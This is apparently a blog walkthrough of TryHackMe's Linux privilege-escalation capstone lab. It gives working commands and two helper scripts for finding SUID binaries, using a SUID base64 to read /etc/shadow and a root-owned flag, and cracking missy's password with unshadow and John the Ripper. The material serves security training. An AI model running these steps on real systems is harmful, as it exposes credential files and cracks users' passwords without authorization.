TryHackMe Linux Privesc Capstone: A Quick Internal Pentest to Gain Root

This walkthrough will go over the Linux Privilege Escalation Capstone found on TryHackMe. The objective is to assess your understanding gained from the prior course content by placing you in an internal environment where you already possess low-level privileges on a Linux server. Your task is to identify an attack vector that enables you to escalate your privileges to root.

Ready, set, go!

First, we want to check and see if there is a cron job that we can exploit.

cat /etc/crontab

There's nothing for us here. Next, let's look for binaries with the SUID bit set. These run with their owner's privileges (root, when root owns them) no matter who executes them, so any of them that can read or write files on our behalf is a candidate for escalation:

find / -type f -perm -04000 -ls 2>/dev/null

base64 shows up in the list, owned by root with the SUID bit set. base64 will happily read any file it is pointed at, so a SUID copy reads files as root. We use it to pull the root flag directly (the same file-read technique GTFOBins documents for base64):

LFILE=/home/rootflag/flag2.txt
base64 "$LFILE" | base64 --decode
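The enumeration and the base64 trick above are three manual commands; on a real host the SUID list is long and it helps to triage it automatically. The following is an added example (mine, not code from the room or from this write-up) that lists SUID binaries under a root directory, flags the ones on a small hand-picked watchlist of GTFOBins file-read binaries, and wraps the base64 read pipeline as a function. The watchlist contents and the optional owner filter are my assumptions, not anything the room states.

```shell
#!/bin/sh
# Added example, not part of the TryHackMe room or this write-up: enumerate
# setuid binaries under a given root and flag the ones that, once they run
# as root, let any user read arbitrary files. The watchlist is a hand-picked
# subset of the GTFOBins "file read" entries, not an exhaustive list.

# Binaries that print a file (or an encoding of it) and therefore leak any
# root-readable file when they carry the setuid bit and are owned by root.
SUID_READ_WATCHLIST="base64 cat cut head tail xxd strings more less"

# suid_list ROOT [OWNER]: every regular file under ROOT with the setuid bit
# set, one path per line; optionally restricted to files owned by OWNER
# (on a real target you want "root"). Unreadable directories are skipped.
suid_list() {
    if [ -n "$2" ]; then
        find "$1" -type f -perm -4000 -user "$2" 2>/dev/null
    else
        find "$1" -type f -perm -4000 2>/dev/null
    fi
}

# suid_flag ROOT [OWNER]: the subset of suid_list whose basename is on the
# watchlist. This is the triage step; the raw find output on a stock distro
# is mostly expected entries (passwd, sudo, mount, ...).
suid_flag() {
    suid_list "$1" "$2" | while IFS= read -r path; do
        name=${path##*/}
        case " $SUID_READ_WATCHLIST " in
            *" $name "*) printf '%s\n' "$path" ;;
        esac
    done
}

# suid_read BIN FILE: the room's trick. base64 has no raw-print mode, so the
# setuid binary at BIN encodes FILE and an ordinary base64 decodes it again.
# On the target BIN is simply "base64"; here it is a parameter so the
# pipeline can be exercised with any base64.
suid_read() {
    "$1" "$2" | base64 --decode
}

# Usage on the target:  suid_flag / root ; suid_read base64 /etc/shadow
```

Run `suid_flag / root` on the box to get only the interesting hits, then `suid_read base64 /home/rootflag/flag2.txt` reproduces the flag read from the write-up.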

Well, that worked for obtaining the root flag! Acquiring flag1 was a bit more challenging and required the use of unshadow. This tool merges the passwd and shadow files into a single file that John the Ripper can crack. Reading /etc/shadow normally needs root, but the SUID base64 reads it for us:

LFILE=/etc/shadow
base64 "$LFILE" | base64 --decode

Copy and save the content into a shadow.txt file.

Grab the contents from passwd.

cat /etc/passwd

Copy and save the content into a passwd.txt file.

Combine the files and use John the Ripper with the rockyou wordlist to crack the passwords:

unshadow passwd.txt shadow.txt > passwords.txt
john --wordlist=/usr/share/wordlists/rockyou.txt passwords.txt
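To make visible what unshadow actually produces, here is an added example (mine, not from the room or from John the Ripper) that does the same join in awk over constructed passwd and shadow lines, then drops the accounts john cannot crack anyway (locked `!`/`*` entries) so the wordlist run is spent only on real hashes. The usernames mirror the ones in this write-up; the hash strings are placeholders, not real hashes.

```shell
#!/bin/sh
# Added example, not part of the TryHackMe room or this write-up: reproduce
# the join that unshadow performs with awk, so the merged format john reads
# is visible, and filter out entries that are not worth cracking.
# The passwd/shadow lines are constructed samples with placeholder hashes.

SAMPLE_PASSWD='root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
missy:x:1001:1001:missy:/home/missy:/bin/bash
rootflag:x:1002:1002::/home/rootflag:/bin/bash'

SAMPLE_SHADOW='root:*:18000:0:99999:7:::
daemon:*:18000:0:99999:7:::
missy:$6$constructedsalt$constructedhash:18000:0:99999:7:::
rootflag:!:18000:0:99999:7:::'

# merge_shadow PASSWD_FILE SHADOW_FILE: for each passwd entry, replace the
# "x" in field 2 with the hash from the shadow entry of the same username.
# Output keeps passwd order and all other fields (GECOS, home, shell), which
# john's single-crack mode uses as candidate words. Assumes a non-empty
# shadow file (the NR==FNR idiom reads the first file into the hash table).
merge_shadow() {
    awk -F: 'NR==FNR { hash[$1] = $2; next }
             ($1 in hash) { $2 = hash[$1] }
             { print }' OFS=: "$2" "$1"
}

# crackable_only: keep merged lines whose second field is an actual hash.
# "*" and "!" prefixes mean locked or disabled; an empty field means no
# password is set, so there is nothing for john to do with any of them.
crackable_only() {
    awk -F: '$2 != "" && $2 !~ /^[*!]/'
}

# Usage on the attacking host, after saving the two files from the target:
#   merge_shadow passwd.txt shadow.txt | crackable_only > passwords.txt
#   john --wordlist=/usr/share/wordlists/rockyou.txt passwords.txt
```

Against the constructed samples only the missy line survives the filter, which is exactly the account the real unshadow run hands to john on this box. Filtering is optional, since john skips entries it cannot parse, but it keeps the output readable and stops `john --show` from listing locked accounts.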

Now that we have missy's account password, we can switch to her account and retrieve the final flag from her Documents folder:

su missy
ls -la /home/missy/documents

Summary

In this walkthrough, we explore the Linux Privilege Escalation Capstone on TryHackMe, aiming to escalate our privileges to root. We begin by checking for exploitable cron jobs and then enumerate SUID binaries. We abuse the SUID base64 binary to read the root flag and /etc/shadow as root, then use unshadow and John the Ripper to crack missy's password and retrieve the final flag from her Documents folder.

Support Jake Garrison by becoming a sponsor. Any amount is appreciated!